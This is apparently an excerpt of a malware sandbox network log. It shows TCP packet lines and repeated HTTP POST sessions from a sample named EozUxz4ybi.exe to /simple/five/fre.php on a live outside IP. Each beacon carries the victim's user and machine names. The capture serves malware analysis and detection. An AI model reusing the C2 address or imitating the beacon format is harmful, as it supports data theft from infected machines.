                                Jan 11, 2025 01:44:14.935163975 CET805154494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:14.935173035 CET5154480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:14.935240030 CET5154480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:14.940026999 CET805154494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.076941967 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.081876040 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.081954956 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.083908081 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.088762999 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.088828087 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.093705893 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.838354111 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.838469982 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:15.838515043 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.838515997 CET5155080192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:15.843354940 CET805155094.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.003818989 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.008610964 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.008663893 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.010884047 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.015631914 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.015685081 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.020447016 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.721132994 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.721393108 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.723731995 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.723808050 CET5155780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.728116989 CET805155794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.858210087 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.863413095 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.863492012 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.865232944 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.870196104 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:16.870270014 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:16.875386953 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.604012966 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.604119062 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.604171991 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.604212999 CET5156580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.609005928 CET805156594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.763300896 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.768315077 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.768402100 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.771429062 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.776393890 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:17.776453972 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:17.781348944 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.481522083 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.481606007 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.481641054 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.481703997 CET5157180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.486525059 CET805157194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.892911911 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.897749901 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.897819042 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.900230885 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.905059099 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:18.905117035 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:18.909972906 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.611534119 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.611560106 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.611694098 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.611742973 CET5157780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.616542101 CET805157794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.752892971 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.757946968 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.758064985 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.760009050 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.764894009 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:19.764965057 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:19.769912004 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.465841055 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.465954065 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.466095924 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.466202974 CET5158180192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.471075058 CET805158194.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.613390923 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.618434906 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.618583918 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.620706081 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.625672102 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:20.625880957 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:20.630822897 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.591641903 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.591666937 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.591680050 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.591734886 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.591883898 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.591883898 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.591883898 CET5158280192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.596714973 CET805158294.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.725527048 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.730679035 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.730803967 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.732814074 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.737637997 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:21.737699986 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:21.742543936 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.440511942 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.440615892 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.440624952 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.440668106 CET5158380192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.445569038 CET805158394.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.595025063 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.600199938 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.600321054 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.602380991 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.607300997 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:22.607372999 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:22.612381935 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.341622114 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.341759920 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.341845989 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.341907978 CET5158480192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.346760988 CET805158494.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.502188921 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.507136106 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.509182930 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.511257887 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.516045094 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:23.517155886 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:23.521920919 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.227340937 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.227418900 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.227497101 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.227519989 CET5158580192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.233684063 CET805158594.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.349975109 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.354939938 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.355515957 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.357515097 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.362418890 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:24.362510920 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:24.369163036 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.071022034 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.071055889 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.071196079 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.071264982 CET5158680192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.076049089 CET805158694.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.195159912 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.200387955 CET805158794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.200558901 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.202620029 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.207501888 CET805158794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.207597971 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.212487936 CET805158794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.895649910 CET805158794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.895720005 CET805158794.156.177.41192.168.2.8
                                Jan 11, 2025 01:44:25.895893097 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.897126913 CET5158780192.168.2.894.156.177.41
                                Jan 11, 2025 01:44:25.902384996 CET805158794.156.177.41192.168.2.8
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 11, 2025 01:43:02.900701046 CET5359773162.159.36.2192.168.2.8
                                Jan 11, 2025 01:43:03.548760891 CET53627131.1.1.1192.168.2.8
                                • 94.156.177.41
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.84970494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:20.812382936 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 180
                                Connection: close
                                Jan 11, 2025 01:42:20.817287922 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: 'ckav.ruhubert376483HUBERT-PCk0FDD42EE188E931437F4FBE2CEmz9v
                                Jan 11, 2025 01:42:21.548294067 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:21 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.84970594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:22.233244896 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 180
                                Connection: close
                                Jan 11, 2025 01:42:22.238847971 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: 'ckav.ruhubert376483HUBERT-PC+0FDD42EE188E931437F4FBE2CRv9Cl
                                Jan 11, 2025 01:42:22.950077057 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:22 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.84970694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:23.035248995 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:23.040246964 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:23.762090921 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:23 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.84970794.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:23.915548086 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:23.920672894 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:24.642745018 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:24 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.84970894.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:25.192168951 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:25.197135925 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:25.937805891 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:25 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.84970994.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:26.097378969 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:26.102355003 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:26.818130016 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:26 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.84971094.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:26.963864088 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:26.968789101 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:27.702923059 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:27 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.84971194.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:28.130974054 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:28.135809898 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:28.855298042 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:28 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.84971294.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:29.014556885 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:29.019551039 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:29.739046097 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:29 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.84971394.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:29.885778904 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:29.891717911 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:30.609095097 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:30 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.84971494.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:31.079433918 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:31.084444046 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:31.824528933 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:31 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.84971594.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:31.987454891 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: A6A8C306
                                Content-Length: 153
                                Connection: close
                                Jan 11, 2025 01:42:31.992422104 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 33 00 37 00 36 00 34 00 38 00 33 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00
                                Data Ascii: (ckav.ruhubert376483HUBERT-PC0FDD42EE188E931437F4FBE2C
                                Jan 11, 2025 01:42:32.733211994 CET186INHTTP/1.1 404 Not Found
                                Server: nginx/1.26.1
                                Date: Sat, 11 Jan 2025 00:42:32 GMT
                                Content-Type: text/html; charset=utf-8
                                Connection: close
                                X-Powered-By: PHP/5.4.16
                                Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.84971694.156.177.41802884C:\Users\user\Desktop\EozUxz4ybi.exe
                                TimestampBytes transferredDirectionData
                                Jan 11, 2025 01:42:32.884510994 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: 94.156.177.41
